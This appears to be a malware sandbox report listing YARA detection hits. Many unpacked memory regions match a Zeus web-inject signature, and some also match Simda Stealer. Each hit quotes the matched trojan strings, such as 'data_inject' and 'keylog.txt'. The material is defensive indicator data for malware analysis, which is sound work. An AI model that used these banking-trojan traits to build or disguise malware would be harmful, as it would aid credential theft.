23.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2922000.2.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
0.3.roundwood.exe.6bff18.1.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
0.3.roundwood.exe.6bf318.0.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48410:$a1: name=%s&port=%u 0x47ba8:$a2: data_inject 0x47d98:$a3: keylog.txt 0x47a3d:$a4: User-agent: %s]]] 0x48564:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.14.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
2.2.svchost.exe.2915c00.3.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
27.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2da0000.3.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.21.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
15.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.960000.2.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
38.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2900000.3.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
2.2.svchost.exe.28c2000.4.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
27.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.29f2000.2.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.21.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.36.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.12.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
25.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.8e2000.1.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.39.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.31.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
2.3.svchost.exe.2dc0000.43.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
2.3.svchost.exe.2dc0000.44.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
2.3.svchost.exe.2dc0000.44.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
31.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.25d0000.3.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
2.3.svchost.exe.3c20000.9.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.22.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.36.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
2.3.svchost.exe.2970000.6.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.17.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
8.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.e70000.3.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.20.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.14.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
29.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2922000.2.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
29.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2d00000.3.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
0.3.roundwood.exe.6ba318.2.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4d410:$a1: name=%s&port=%u 0x4cba8:$a2: data_inject 0x4cd98:$a3: keylog.txt 0x4ca3d:$a4: User-agent: %s]]] 0x4d564:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.17.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.27.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.25.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
0.2.roundwood.exe.407000.2.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
36.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.28c2000.2.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
0.2.roundwood.exe.407000.2.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
5.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.dd2000.2.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.13.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
2.2.svchost.exe.2d00000.5.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
2.2.svchost.exe.28c2000.4.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
2.3.svchost.exe.2970000.6.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
2.3.svchost.exe.3c20000.9.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.24.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
2.2.svchost.exe.400000.0.unpack	JoeSecurity_SimdaStealer	Yara detected Simda Stealer	Joe Security
2.2.svchost.exe.400000.0.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4e810:$a1: name=%s&port=%u 0x4dfa8:$a2: data_inject 0x4e198:$a3: keylog.txt 0x4de3d:$a4: User-agent: %s]]] 0x4e964:$a5: %s\%02d.bmp
34.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2950000.3.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
36.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2c90000.3.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
0.3.roundwood.exe.6ba318.2.raw.unpack	JoeSecurity_SimdaStealer	Yara detected Simda Stealer	Joe Security
0.3.roundwood.exe.6ba318.2.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4e810:$a1: name=%s&port=%u 0x4dfa8:$a2: data_inject 0x4e198:$a3: keylog.txt 0x4de3d:$a4: User-agent: %s]]] 0x4e964:$a5: %s\%02d.bmp
5.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.e30000.3.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.23.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.28.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.40.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
2.3.svchost.exe.88e000.2.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4d410:$a1: name=%s&port=%u 0x4cba8:$a2: data_inject 0x4cd98:$a3: keylog.txt 0x4ca3d:$a4: User-agent: %s]]] 0x4d564:$a5: %s\%02d.bmp
12.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.14b0000.3.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
4.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.12e0000.3.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.35.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
12.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.1412000.2.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.32.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
15.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.902000.1.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
2.3.svchost.exe.893000.5.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49810:$a1: name=%s&port=%u 0x48fa8:$a2: data_inject 0x49198:$a3: keylog.txt 0x48e3d:$a4: User-agent: %s]]] 0x49964:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.37.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
34.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2950000.3.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
4.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.1242000.2.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
15.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.902000.1.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.11.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.33.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.24.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.25.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
31.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2412000.2.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
2.3.svchost.exe.893000.0.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48410:$a1: name=%s&port=%u 0x47ba8:$a2: data_inject 0x47d98:$a3: keylog.txt 0x47a3d:$a4: User-agent: %s]]] 0x48564:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.32.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.18.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
2.2.svchost.exe.2d00000.5.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.16.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
8.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.c52000.1.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.28.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
27.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2da0000.3.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.19.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
